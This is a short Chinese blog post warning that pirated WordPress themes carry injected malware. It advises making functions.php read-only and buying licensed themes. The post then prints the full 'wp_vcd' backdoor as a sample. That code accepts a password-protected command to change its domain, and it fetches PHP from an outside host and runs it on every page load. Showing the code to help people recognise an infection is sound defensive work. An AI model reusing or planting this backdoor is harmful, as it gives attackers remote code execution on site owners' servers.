非正版的wordpress主题被嵌入恶意代码

很多非正版的wordpress主题被嵌入恶意代码,该怎么办呢?

有高手可以找出恶意代码的所在,所以对技术狂人来说不是问题;

手一般的,可以通过以下方式,恶意代码一般是感染主题下的functions文件,不论你如何修改,每次刷新还是会自动的感染。所以我们要通过权限,让文件不能任意写入。具体的方法就是通过FTP或者Cpanel进入文件夹之后,把权限改为444,一般原来的权限是644. 这样虽然没有解决根本问题,但也算解决了问题。

所以呢,建议有能力的还是购买正版,大约30-60刀;

有技术能力的呢,建议自己捣鼓,不作不死,不死不作;

有技术又有资金能力的呢。哈哈哈哈,世界上没有这种人,凡是搞这一类技术的,都是屌丝。哈哈哈哈

 

常见的恶意代码如下。

 

<?php

if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘fe3ddbd8b74ab88794438414f5c645af’))
{
$div_code_name=”wp_vcd”;
switch ($_REQUEST[‘action’])
{
case ‘change_domain’;
if (isset($_REQUEST[‘newdomain’]))
{

if (!empty($_REQUEST[‘newdomain’]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‘/\$tmpcontent = @file_get_contents\(“http:\/\/(.*)\/code9\.php/i’,$file,$matcholddomain))
{

$file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);
@file_put_contents(__FILE__, $file);
print “true”;
}
}
}
}
break;

default: print “ERROR_WP_ACTION WP_V_CD WP_CD”;
}

die(“”);
}
if ( ! function_exists( ‘wp_temp_setup’ ) ) {
$path=$_SERVER[‘HTTP_HOST’].$_SERVER[REQUEST_URI];
if ( ! is_admin() && ! is_404() && stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {

if($tmpcontent = @file_get_contents(“http://www.aotson.com/code9.php?i=”.$path))
{
function wp_temp_setup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), “wp_temp_setup”);
$handle = fopen($tmpfname, “w+”);
fwrite($handle, “<?php\n” . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}

extract(wp_temp_setup($tmpcontent));
}
}
}

?>

关注微信公众号

上一篇文章
我的主持人故事:市区主持人评论–麦客网络外贸建站
下一篇文章
Bluehost自豪地支持WP-CLI项目–麦客网络外贸建站
菜单